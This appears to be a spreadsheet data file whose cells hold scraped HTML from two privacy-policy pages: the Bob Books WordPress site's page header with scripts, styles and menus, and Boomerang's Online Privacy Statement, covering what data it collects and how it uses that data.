&lt;script src='https://bobbooks.com/wp-content/plugins/jquery-manager/assets/js/jquery-migrate-1.4.1.min.js' id='jquery-migrate-js'&gt;&lt;/script&gt;
&lt;script id='monsterinsights-frontend-script-js-extra'&gt;
var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,pdf,ppt,zip,xls,docx,pptx,xlsx","inbound_paths":"[]","home_url":"https:\/\/bobbooks.com","hash_tracking":"false"};
&lt;/script&gt;
&lt;script src='https://bobbooks.com/wp-content/plugins/google-analytics-premium/assets/js/frontend.min.js?ver=7.10.4' id='monsterinsights-frontend-script-js'&gt;&lt;/script&gt;
&lt;script async defer src='https://stats.wp.com/s-202315.js' id='woocommerce-analytics-js'&gt;&lt;/script&gt;
&lt;script src='https://bobbooks.com/wp-content/plugins/theme-customisations-master/custom/custom.js?ver=5.7.8' id='custom-js-js'&gt;&lt;/script&gt;
&lt;script src='https://st.poynt.net/snippet/poynt-collect/bundle-st.js' id='poynt-collect-sdk-js'&gt;&lt;/script&gt;
&lt;script src='https://bobbooks.com/wp-content/mu-plugins/gd-system-plugin/plugins/mwc-core/assets/js/payments/frontend/poynt.js' id='mwc-payments-poynt-payment-form-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://bobbooks.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://bobbooks.com/wp-json/wp/v2/pages/678" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://bobbooks.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://bobbooks.com/wp-includes/wlwmanifest.xml" /&gt; 
&lt;meta name="generator" content="WordPress 5.7.8" /&gt;
&lt;meta name="generator" content="WooCommerce 5.4.4" /&gt;
&lt;link rel="canonical" href="https://bobbooks.com/privacy-policy/" /&gt;
&lt;link rel='shortlink' href='https://bobbooks.com/?p=678' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://bobbooks.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fbobbooks.com%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://bobbooks.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fbobbooks.com%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;style type='text/css'&gt;img#wpstats{display:none}&lt;/style&gt;	&lt;noscript&gt;&lt;style&gt;.woocommerce-product-gallery{ opacity: 1 !important; }&lt;/style&gt;&lt;/noscript&gt;
	&lt;style id="custom-background-css"&gt;
body.custom-background { background-color: #d6ffff; }
&lt;/style&gt;
	&lt;link rel="icon" href="https://bobbooks.com/wp-content/uploads/2018/09/cropped-Icon01-32x32.png" sizes="32x32" /&gt;
&lt;link rel="icon" href="https://bobbooks.com/wp-content/uploads/2018/09/cropped-Icon01-192x192.png" sizes="192x192" /&gt;
&lt;link rel="apple-touch-icon" href="https://bobbooks.com/wp-content/uploads/2018/09/cropped-Icon01-180x180.png" /&gt;
 &lt;meta name="msapplication-TileImage" content="https://bobbooks.com/wp-content/uploads/2018/09/cropped-Icon01-270x270.png" /&gt;
		&lt;style id="wp-custom-css"&gt;
#trustmarks {
	background-color: #e6ffff;
	border-radius: 3%/ 50%;
}
.col2 {
	width: 50%;
	float: left;
}
.rightimg {
	float: right;
	max-height: 180px;
	margin-left: 15px;
}
/*Media Inquiry*/
@media screen and (max-width: 767px) {
	.col2 {
		width: 100%;
	}
	.rightimg {
		display: none;
	}
	.bcleft {
		float: none;
		width: 100%;
	}
	.bcright {
		float: none;
		width: 100%;
	}
}
/*End</t>
  </si>
  <si>
    <t>Media Inquiry*/
/*Sidebar widget CSS*/
.widget .widget-title, .widget .widgettitle {
	margin-bottom: 0em;
}
#woocommerce_product_categories-2 {
	background-color: rgba(41, 194, 209, 0.3);
	padding: 10px 0px 10px 10px;
	border-radius: 20px 0px 20px 0px;
	margin-top: 10px;
	box-shadow: 3px 3px 15px grey;
}
/*Custom Side Nav*/
.side_nav_links {
	font-size: 1.15em;
	line-height: 2;
	margin-left: 10px;
}
.side_nav_links p {
	margin-right: 20px;
	margin-bottom: -20px;
  line-height: 1.4;
	font-weight: 300;
}
.bar-title {
	display: block;
	font-size: 1.41575em;
    letter-spacing: 0;
    border-bottom: 1px solid rgba(0,0,0,.05);
    padding: 0 0 0em;
	font-weight: 700;
}
/*Newsletter CSS*/
#text-3 {
	background-color: rgba(41, 194, 209, 0.3);
	padding:</t>
  </si>
  <si>
    <t>10px 10px 10px 10px;
	border-radius: 20px 0px 20px 0px;
	margin-top: 10px;
	box-shadow: 3px 3px 15px grey;
}
/*AWARDS*/
.awardimgdiv {
	float: left;
	width: 15%;
}
.awardimg {
	max-width: 90%;
}
.awardtext {
	float: left;
	width: 85%;
}
.awardh3 {
  color: #313751;
	font-size: 1.3em;
	font-weight: bold;
}
.clearleft {
	clear: left;
}
.aboutmenu {
	font-size: 1.2em;
	padding-right: 20px;
}
/*Costco Bonus Content Page*/
.bcpage {
	background-color: #33c1ce;
}
.bcbox {
	background-color: #7b88b5;
	max-width: 930px;
	margin: auto;
	padding-bottom: 8px;
}
.bcbox h2 {
	color: white;
	padding-top: 10px;
}
.bca {
	color: white;
}
.bca:visited {
	color:white;
}
.bca:hover {
	color: yellow;
}
.bcfoot {
	color: white;
	text-align: center;
	margin-top: 10px;
	padding-bottom: 20px;
}
/* Main logo resize*/
.custom-logo-link {
	max-width: 126px;
}
@media (max-width: 44em) {
	.custom-logo-link {
		max-width: 75px;
	}
}		&lt;/style&gt;
		&lt;/head&gt;
&lt;body class="privacy-policy page-template-default page page-id-678 custom-background wp-custom-logo wp-embed-responsive theme-storefront wc-pac-hide-sale-flash wc-pac-hide-product-count</t>
  </si>
  <si>
    <t>wc-pac-hide-rating woocommerce-no-js storefront-secondary-navigation storefront-align-wide right-sidebar woocommerce-active elementor-default elementor-kit-4993"&gt;
&lt;div id="page" class="hfeed site"&gt;
	&lt;header id="masthead" class="site-header" role="banner" style="background-image: url(https://bobbooks.com/wp-content/uploads/2018/11/Home-Header4.png); "&gt;
		&lt;div class="col-full"&gt;		&lt;a class="skip-link screen-reader-text" href="#site-navigation"&gt;Skip to navigation&lt;/a&gt;
		&lt;a class="skip-link screen-reader-text" href="#content"&gt;Skip to content&lt;/a&gt;
				&lt;div class="site-branding"&gt;
			&lt;a href="https://bobbooks.com/" class="custom-logo-link" rel="home"&gt;&lt;img width="512" height="463" src="https://bobbooks.com/wp-content/uploads/2018/09/cropped-cropped-Icon01.png" class="custom-logo" alt="Bob Books" srcset="https://bobbooks.com/wp-content/uploads/2018/09/cropped-cropped-Icon01.png 512w, https://bobbooks.com/wp-content/uploads/2018/09/cropped-cropped-Icon01-416x376.png 416w, https://bobbooks.com/wp-content/uploads/2018/09/cropped-cropped-Icon01-300x271.png 300w" sizes="(max-width: 512px) 100vw, 512px" /&gt;&lt;/a&gt;		&lt;/div&gt;
					&lt;nav class="secondary-navigation" role="navigation" aria-label="Secondary Navigation"&gt;
							&lt;/nav&gt;&lt;!-- #site-navigation --&gt;
						&lt;div class="site-search"&gt;
				&lt;div class="widget woocommerce widget_product_search"&gt;&lt;form role="search" method="get" class="woocommerce-product-search" action="https://bobbooks.com/"&gt;
	&lt;label class="screen-reader-text" for="woocommerce-product-search-field-0"&gt;Search for:&lt;/label&gt;
	&lt;input type="search" id="woocommerce-product-search-field-0" class="search-field" placeholder="Search products&amp;hellip;" value="" name="s" /&gt;
	&lt;button type="submit" value="Search"&gt;Search&lt;/button&gt;
	&lt;input type="hidden" name="post_type" value="product" /&gt;
&lt;/form&gt;
&lt;/div&gt;			&lt;/div&gt;
			&lt;/div&gt;&lt;div class="storefront-primary-navigation"&gt;&lt;div class="col-full"&gt;		&lt;nav id="site-navigation" class="main-navigation" role="navigation" aria-label="Primary Navigation"&gt;
		&lt;button class="menu-toggle" aria-controls="site-navigation" aria-expanded="false"&gt;&lt;span&gt;Menu&lt;/span&gt;&lt;/button&gt;
			&lt;div class="primary-navigation"&gt;&lt;ul id="menu-primary-menu" class="menu"&gt;&lt;li id="menu-item-936" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-936"&gt;&lt;a href="https://bobbooks.com/books/"&gt;Shop&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-117" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-117"&gt;&lt;a href="https://bobbooks.com/about/"&gt;Learn More&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-254" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-254"&gt;&lt;a href="https://bobbooks.com/funactivity/"&gt;Activities&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-920" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-920"&gt;&lt;a href="https://bobbooks.com/my-account/"&gt;My Account&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-2494" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2494"&gt;&lt;a href="https://bobbooks.com/contact/"&gt;Contact&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;div class="handheld-navigation"&gt;&lt;ul id="menu-handheld-menu" class="menu"&gt;&lt;li id="menu-item-994" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-994"&gt;&lt;a href="https://bobbooks.com/"&gt;Home&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-938" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-938"&gt;&lt;a href="https://bobbooks.com/books/"&gt;Shop&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-917" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-917"&gt;&lt;a href="https://bobbooks.com/about/"&gt;Learn More&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-915" class="menu-item menu-item-type-post_ty</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;!-- saved from url=(0033)https://www.boomerang.com/privacy --&gt;
&lt;html&gt;&lt;head&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"&gt;&lt;style class="vjs-styles-defaults"&gt;
      .video-js {
        width: 300px;
        height: 150px;
      }
      .vjs-fluid {
        padding-top: 56.25%
      }
    &lt;/style&gt;&lt;style type="text/css"&gt;@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none ! important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}&lt;/style&gt;
  &lt;title&gt;Boomerang | Full Episodes of Your Family’s Favorite Cartoons&lt;/title&gt;
  &lt;!-- build:base --&gt;
  &lt;!--&lt;base href="/"&gt;--&gt;&lt;base href=".</t>
  </si>
  <si>
    <t>"&gt;
  &lt;!-- endbuild --&gt;
  &lt;meta name="description" content="Boomerang has full episodes of all your favorite cartoons all in one place! Your family will love watching classic cartoon shows like Looney Tunes, Tom and Jerry, The Flintstones, Yogi Bear, and so many more. "&gt;
  &lt;meta name="keywords"&gt;
  &lt;meta name="viewport" content="width=device-width,height=device-height"&gt;
  &lt;meta name="dramafever:health" content="good"&gt;
  &lt;meta name="google-site-verification" content="susc7VXauAGWO4ClClnSsW77FiPN_BiA0ZC7C1AincI"&gt;
  &lt;meta name="google-site-verification" content="_DXvt1gOazmRk6NP_pUMzOpPGLB2llKxutiIlusI37Q"&gt;
  &lt;meta name="google-site-verification" content="KCL0Va4OWf19Nxmp3Lcprm9gAh4RwdlQ3qqhG0vwpIA"&gt;
  &lt;meta name="google-site-verification" content="ERqVlV5MxMZb0id1c6CocnfNiq_8e2QCIS8OvtMrGvg"&gt;
  &lt;!--</t>
  </si>
  <si>
    <t>Twitter Card Information --&gt;
  &lt;meta name="twitter:card" content="summary_large_image"&gt;
  &lt;meta name="twitter:title" content="Boomerang | Full Episodes of Your Family’s Favorite Cartoons"&gt;
  &lt;meta name="twitter:description" content="Boomerang has full episodes of all your favorite cartoons all in one place! Your family will love watching classic cartoon shows like Looney Tunes, Tom and Jerry, The Flintstones, Yogi Bear, and so many more. "&gt;
  &lt;meta name="twitter:creator" content="@boomerangtoons"&gt;
  &lt;meta name="twitter:image:src" content="https://www.boomerang.com/builds/70b35926/images/social/default_share.jpg"&gt;
  &lt;!--</t>
  </si>
  <si>
    <t>Open-Graph Information --&gt;
  &lt;meta property="og:type" content="article"&gt;
  &lt;meta property="og:title" content="Boomerang | Full Episodes of Your Family’s Favorite Cartoons"&gt;
  &lt;meta property="og:site_name" content="Boomerang"&gt;
  &lt;meta property="og:description" content="Boomerang has full episodes of all your favorite cartoons all in one place! Your family will love watching classic cartoon shows like Looney Tunes, Tom and Jerry, The Flintstones, Yogi Bear, and so many more. "&gt;
  &lt;meta property="og:image" content="https://www.boomerang.com/builds/70b35926/images/social/default_share.jpg"&gt;
  &lt;meta property="og:url" content="https://www.boomerang.com/privacy"&gt;
  &lt;meta property="og:locale" content="en_US"&gt;
  &lt;meta name="prerender-status-code" content="200"&gt;
  &lt;meta name="prerender-header"&gt;
  &lt;link rel="canonical" href="https://www.boomerang.com/privacy"&gt;
  &lt;link rel="stylesheet" type="text/css" href="./privacy-static/fontface.css"&gt;
  &lt;link rel="stylesheet" type="text/css" href="./privacy-static/fontastic.css"&gt;
  &lt;link rel="icon" href="./privacy-static/favicon.png" type="image/png"&gt;
  &lt;!-- bower:css --&gt;
  &lt;link rel="stylesheet" href="./privacy-static/libs.min.css"&gt;
  &lt;!-- endinject --&gt;
  &lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">inject:css --&gt;
  &lt;link rel="stylesheet" href="./privacy-static/boom-www.min.css"&gt;
  &lt;!-- endinject --&gt;
&lt;/head&gt;
&lt;body state-classes="" class="privacy-container"&gt;
  &lt;!----&gt;&lt;div class="site-container" ui-view="" autoscroll="false"&gt;&lt;!----&gt;&lt;div ui-view=""&gt;
&lt;div class="flat-page"&gt;
  &lt;div class="container-md"&gt;
    &lt;h1 class="flat-page__header"&gt;Boomerang Online Privacy Statement&lt;/h1&gt;
    &lt;div class="content" style=""&gt;&lt;p class="p1"&gt;&lt;span class="s1"&gt;&lt;strong&gt;Boomerang Online Privacy Statement&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p class="p2"&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class="p3"&gt;&lt;span class="s1"&gt;Effective Date: &lt;/span&gt;&lt;span class="s2"&gt;January 1, 2020&lt;/span&gt;&lt;/p&gt;
&lt;p class="p4"&gt;&lt;span class="s1"&gt;To see the prior version of this Privacy Policy, go to &lt;/span&gt;&lt;span class="s2"&gt;&lt;a href="https://www.boomerang.com/privacy-old" target="_self"&gt;www.boomerang.com/privacy-old&lt;/a&gt;&lt;/span&gt;&lt;span class="s1"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p class="p2"&gt;&amp;nbsp;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;p class="p2"&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class="p4"&gt;&lt;span class="s1"&gt;Thank you for visiting&amp;nbsp;&lt;strong&gt;BOOMERANG&lt;/strong&gt;, a digital service presented to you by Boomerang Plus LLC, its affiliates and licensors including Cartoon Interactive Group, Inc., WB Communications Inc., Turner Broadcasting System, Inc. (“Turner”), Warner Bros. Entertainment Inc., and Warner Bros. Digital Labs, a Warner Media subsidiary and on demand video platform technology provider (collectively, "BOOMERANG," "Us" or "We"). Please take the time to read this full privacy policy (“Privacy Policy”) explaining our online practices by our Warner Media family of companies related to data collected, used, disclosed and stored by or on behalf of Boomerang.</t>
  </si>
  <si>
    <t>Boomerang is a part of Turner’s network of affiliated and operated digital services ("Turner Network"), which includes any online or mobile websites, applications or digital services owned, operated or offered by, on behalf of, or in conjunction with Turner or its Affiliates, including any online or mobile website, application or digital service installation where this Privacy Policy appears (each a “Service,” collectively the “Services”). You consent to the data collection, use, disclosure and storage practices described in this Privacy Policy when you or any User visit Boomerang or access its content or videos.&amp;nbsp;&lt;/span&gt;&lt;span class="s3"&gt;A list Affiliates is available &lt;/span&gt;&lt;span class="s4"&gt;&lt;a href="https://policies.warnerbros.com/privacy/en-us/affiliates"&gt;here&lt;/a&gt;&lt;/span&gt;&lt;span class="s3"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p class="p2"&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class="p3"&gt;&lt;span class="s1"&gt;Finally, we note that California law requires us to provide certain information about how we collect and use the personal information of California residents and to grant those California residents certain rights with respect to their data.&lt;span class="Apple-converted-space"&gt;&amp;nbsp; &lt;/span&gt; If you are a California resident, please see&amp;nbsp;&lt;/span&gt;&lt;span class="s2"&gt;Section VII&lt;/span&gt;&lt;span class="s1"&gt; of this Policy for these disclosures and a description of your privacy rights, including a right to access, delete, or opt out of the sale of your personal information.&lt;br&gt; &lt;/span&gt;&lt;/p&gt;
&lt;ol class="terms-table"&gt; &lt;li&gt;&lt;a href="./privacy-static.html#TheInformationWeCollect"&gt;The Information We Collect&lt;/a&gt;&lt;/li&gt; &lt;ol type="“1”"&gt; &lt;li&gt;&lt;a href="./privacy-static.html#InformationYouProvideToUs"&gt;Information</t>
  </si>
  <si>
    <t>You Provide To Us&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href="./privacy-static.html#InformationThatIsPassively"&gt;Information That Is Passively or Automatically Collected&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href="./privacy-static.html#Geo-locationInformation"&gt;Geo-location Information&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href="./privacy-static.html#InformationCollectedByandFromSocial"&gt;Information Collected By and From Social Media Services and Other Third Party Platforms&lt;/a&gt;&lt;/li&gt; &lt;/ol&gt; &lt;li&gt;&lt;a href="./privacy-static.html#HowWeUsetheInformation"&gt;How We Use the Information&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href="./privacy-static.html#InformationSharingandDisclosure"&gt;Information Sharing and Disclosure&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href="./privacy-static.html#CookiesandOtherUserandAd-TargetingTechnologies"&gt;Cookies and Other User and Ad-Targeting Technologies&lt;/a&gt;&lt;/li&gt; &lt;ol type="“1”"&gt; &lt;li&gt;&lt;a href="./privacy-static.html#Cookies"&gt;Cookies&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href="./privacy-static.html#SyncingCookiesandIdentifiers"&gt;Syncing Cookies and Identifiers&lt;/a&gt;&lt;/li &gt; &lt;li&gt;&lt;a href="./privacy-static.html#LocallyStoredObjects"&gt;Locally Stored Objects&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href="./privacy-static.html#DisablingCookies"&gt;Disabling Cookies&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href="./privacy-static.html#WebBeacons"&gt;Web Beacons&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href="./privacy-static.html#MobileDeviceIdentifiersandSDKs"&gt;Mobile Device Identifiers and SDKs&lt;/a&gt;&lt;/li&gt; &lt;/ol&gt; &lt;li&gt;&lt;a</t>
  </si>
  <si>
    <t>href="./privacy-static.html#YourAdChoices"&gt;Your Ad Choices&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href="./privacy-static.html#OtherImportantInformationAboutYourPrivacy"&gt;Other Important Information About Your Privacy&lt;/a&gt;&lt;/li&gt; &lt;ol type="“1”"&gt; &lt;li&gt;&lt;a href="./privacy-static.html#HowWeRespondtoDoNotTrackSignals"&gt;How We Respond to Do Not Track Signals&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href="./privacy-static.html#LinkedServices"&gt;Linked Services&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href="./privacy-static.html#InternationalTransfer"&gt;International Transfer&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href="./privacy-static.html#DataSecurity"&gt;Data Security&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href="./privacy-static.html#AdditionalInformationRegardingChildren"&gt;Additional Information Regarding Children’s Privacy&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href="./privacy-static.html#HowYouCanAccessorCorrectInformation"&gt;How You Can Access or Correct Information&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href="./privacy-static.html#HowtoContactUs"&gt;How to Contact Us/Opting Out of Marketing Communications&lt;/a&gt;&lt;/li&gt; &lt;/ol&gt;
&lt;li&gt;&lt;a href="./privacy-static.html#CaliforniaandCCPAPrivacyRightsandDisclosures"&gt;California and CCPA Privacy Rights and Disclosures&lt;/a&gt;&lt;/li&gt; &lt;ol type="“1”"&gt; &lt;li&gt;&lt;a href="./privacy-static.html#CaliforniaInformationWeCollectedandShared"&gt;California Information We Collected and Shared.</t>
  </si>
  <si>
    <t>&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href="./privacy-static.html#YourCaliforniaPrivacyRightstoRequestDisclosure"&gt;Your California Privacy Rights to Request Disclosure of Information We Collect and Share about You. &lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a</t>
  </si>
  <si>
    <t>href="./privacy-static.html#YourRighttoRequestDeletion"&gt;Your Right to Request the Deletion of California Information &lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="./privacy- static.html#YourRighttoAskUsNottoSell"&gt;Your Right to Ask Us Not to Sell Your California Information &lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="./privacy-static.html#DoNotTrackNotice"&gt;Do Not Track Notice &lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="./privacy-static.html#OurSupport"&gt;Our Support for the Exercise of Your Data Rights &lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="./privacy-static.html#ConsumersUnder16"&gt;Consumers Under 16 Years Old &lt;/a&gt;&lt;/li&gt;&lt;/ol&gt;
&lt;li&gt; &lt;a href="./privacy-static.html#Updates"&gt;Updates&lt;/a&gt;&lt;/li&gt; &lt;/ol&gt;
&lt;p class="p4"&gt;&lt;br&gt;
&lt;span class="s1"&gt;&lt;a id="TheInformationWeCollect"&gt;I. The Information We Collect&lt;/a&gt;&lt;/span&gt;
&lt;/p&gt;&lt;p class="p7"&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class="p8"&gt;&lt;span class="s1"&gt;We receive both information that is directly provided to us, such as personal information you provide when you visit or subscribe to the Services, and information that is passively or automatically collected from you, such as anonymous information collected from your browser or device.</t>
  </si>
  <si>
    <t>In this Privacy Policy, we refer to all of this as the “Information”.&lt;/span&gt;&lt;/p&gt;
&lt;p class="p8"&gt;&lt;span class="s1"&gt;&lt;br&gt; &lt;/span&gt;&lt;/p&gt;
&lt;span class="s1"&gt;&lt;a id="InformationYouProvideToUs"&gt;1. Information You Provide To Us.&lt;/a&gt;&lt;/span&gt;
&lt;p class="p9"&gt;&lt;span class="s1"&gt;At some Services, you can register, order products, enter contests, vote in polls or otherwise express an opinion, subscribe to one of our Services such as a paid membership, sign up for our online newsletters or text message alerts, or participate in one of our online forums or communities. In the course of these various offerings, we often seek to collect from you various forms of Information, such as: name, address, e-mail address, telephone number, fax number and credit card information.</t>
  </si>
  <si>
    <t>At some Services, you may also be able to submit Information about other people. For example, you might submit a person's name and e-mail address to send an electronic greeting card and, if you order a gift online and want it sent directly to the recipient, you might submit the recipient's name and address. This Information that you can submit about another person may include, for instance, a recipient's name, address, e-mail address, and telephone number.&lt;/span&gt;&lt;/p&gt;
&lt;p class="p9"&gt;&lt;span class="s1"&gt;&lt;br&gt; &lt;/span&gt;&lt;/p&gt;
&lt;span class="s1"&gt;&lt;a id="InformationThatIsPassively"&gt;2.</t>
  </si>
  <si>
    <t>Information That is Passively or Automatically Collected.&lt;/a&gt;&lt;/span&gt;
&lt;p class="p9"&gt;&lt;span class="s1"&gt;We, and our “Partners” who include Turner Affiliates, third party service providers, advertisers, advertising networks and platforms, agencies, and distribution or other partners may use automated means to collect various types of Information about you, your computer or other device used to access our Services. A representative, non-exhaustive list of the types of automatically collected information may include: network or Internet protocol address and type of browser you are using (e.g., Chrome, Safari, Firefox, Internet Explorer), the type of operating system you are using, (e.g., Microsoft Windows or Mac OS), the name of your Internet service provider (e.g., Comcast, Verizon or AT&amp;amp;T) and domains used by such providers, mobile network, device identifiers (such as an Apple IDFA or an Android Advertising ID), device settings, browser settings, the web pages of the Services you have visited, Services visited before and after you visit a Service, the type of handheld or mobile device used to view the Service (e.g., iOS, Android), location information, and the content and advertisements you have accessed, seen, forwarded and/or clicked on.</t>
  </si>
  <si>
    <t>Please see our Section titled Cookies, and Other User and Ad-Targeting Technologies for more information about how the foregoing Information may be collected and used.&lt;/span&gt;&lt;/p&gt;
&lt;p class="p9"&gt;&lt;span class="s1"&gt;&lt;br&gt; &lt;/span&gt;&lt;/p&gt;
&lt;span class="s1"&gt;&lt;a id="Geo-locationInformation"&gt;3. Geo-location Information&lt;/a&gt;&lt;/span&gt;
&lt;p class="p9"&gt;&lt;span class="s1"&gt;If you are accessing a Service from a mobile device or through a mobile application , you may be asked to share your precise (GPS level) geo-location information with us so we can customize your experience on our Services or on other Services, and/or with a Partner when we work with a Partner such as a third party mobile ad platform.</t>
  </si>
  <si>
    <t>If you agree to such collection, in most cases, you will be able to turn off such data collection at any time by accessing the privacy settings of your mobile device and/or through the settings in the applicable mobile application.&lt;/span&gt;&lt;/p&gt;
&lt;p class="p9"&gt;&lt;span class="s1"&gt;&lt;br&gt; &lt;/span&gt;&lt;/p&gt;
&lt;span class="s1"&gt;&lt;a id="InformationCollectedByandFromSocial"&gt;4. Information Collected By and From Social Media Services and Other Third Party Platforms&lt;/a&gt;&lt;/span&gt;
&lt;p class="p9"&gt;&lt;span class="s1"&gt;You may also be given the option to engage with our content or Services, such as video, games, applications, and other offerings, on or through social media services or other third party platforms, such as Facebook, or other third-party social media plug-ins, integrations and applications. When you engage with our content or Services on or through social media services or other third party platforms, plug-ins, integrations or applications, you may allow us to have access to certain Information in your profile.</t>
  </si>
  <si>
    <t>This may include your name, e-mail address, photo, gender, birthday, location, an ID associated with the applicable third party platform or social media account user files, photos and videos, your list of friends or connections, people you follow and/or who follow you, or your posts or “likes.” For a description of how social media services and other third party platforms, plug-ins, integrations or applications handle your information, please refer to their respective privacy policies and terms of use, which may permit you to modify your privacy settings. When we interact with you through our content on third party websites, applications, integrations or platforms, we may obtain any information regarding your interaction with that content, such as content you have viewed, your game performance, high scores, and information about advertisements within the content you have been shown or may have clicked on.&lt;/span&gt;&lt;/p&gt;
&lt;p class="p10"&gt;&amp;nbsp;&lt;/p&gt;
&lt;span class="s1"&gt;&lt;a id="HowWeUsetheInformation"&gt;II.</t>
  </si>
  <si>
    <t>How We Use the Information&lt;/a&gt;&lt;/span&gt;
&lt;p class="p7"&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class="p8"&gt;&lt;span class="s1"&gt;We, along with our Partners, may use the Information to:&lt;/span&gt;&lt;/p&gt;
&lt;p class="p2"&gt;&amp;nbsp;&lt;/p&gt;
&lt;span class="s1"&gt;&lt;strong&gt;provide and communicate with you about the Services or your account with us,&lt;/strong&gt;&lt;/span&gt;
&lt;span class="s1"&gt;&lt;strong&gt;fulfill your requests regarding the Services, including without limitation requests for newsletters and notifications,&lt;/strong&gt;&lt;/span&gt;
&lt;span class="s1"&gt;&lt;strong&gt;respond to your inquiries, and notify you if you have won a contest,&lt;/strong&gt;&lt;/span&gt;
&lt;span class="s1"&gt;&lt;strong&gt;communicate with you about other products, programs or services that we believe may be of interest to you,&lt;/strong&gt;&lt;/span&gt;
&lt;span class="s1"&gt;&lt;strong&gt;enforce the legal terms (including without limitation our policies and terms of service) that govern your use of our Services, and/or for the purposes for which you provided the Information,&lt;/strong&gt;&lt;/span&gt;
&lt;span class="s1"&gt;&lt;strong&gt;provide technical support for the Services,&lt;/strong&gt;&lt;/span&gt;
&lt;span class="s1"&gt;&lt;strong&gt;prevent fraud or potentially illegal activities (including, without limitation, copyright infringement) on or through the Services,&lt;/strong&gt;&lt;/span&gt;
&lt;span class="s1"&gt;&lt;strong&gt;protect the safety of our Users,&lt;/strong&gt;&lt;/span&gt;
&lt;span class="s1"&gt;&lt;strong&gt;customize or personalize ads, offers and content made available to you based on your visits to and/or usage of the Services or other online or mobile websites, applications, platforms or services, and analyze the performance of those ads, offers and content, as well as your interaction with them,&lt;/strong&gt;&lt;/span&gt;
&lt;span class="s1"&gt;&lt;strong&gt;perform analysis regarding how you use the Services or any part thereof,&lt;/strong&gt;&lt;/span&gt;
&lt;span class="s1"&gt;&lt;strong&gt;send gifts, cards, invitations or emails if you use these services, to your designated recipients,&lt;/strong&gt;&lt;/span&gt;
&lt;span class="s1"&gt;&lt;strong&gt;for any other purposes disclosed to you at the time we collect your information or pursuant to your consent.&lt;/strong&gt;&lt;/span&gt;
&lt;p class="p7"&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class="p8"&gt;&lt;span class="s1"&gt;When you provide information from your social media account, it can help enable us to do things like (1) give you exclusive content, (2) personalize your online experience with us within and outside our Services, (3) contact you through the social media service or directly by sending you the latest news, special offerings, and rewards, and (4) enable you to share your experience and content via social media services. When you provide information about yourself to us through an application, through our Services, or on social media services or other third party platforms, it may be publicly viewed by other members of these services and we cannot prevent further use of the information by third parties.</t>
  </si>
  <si>
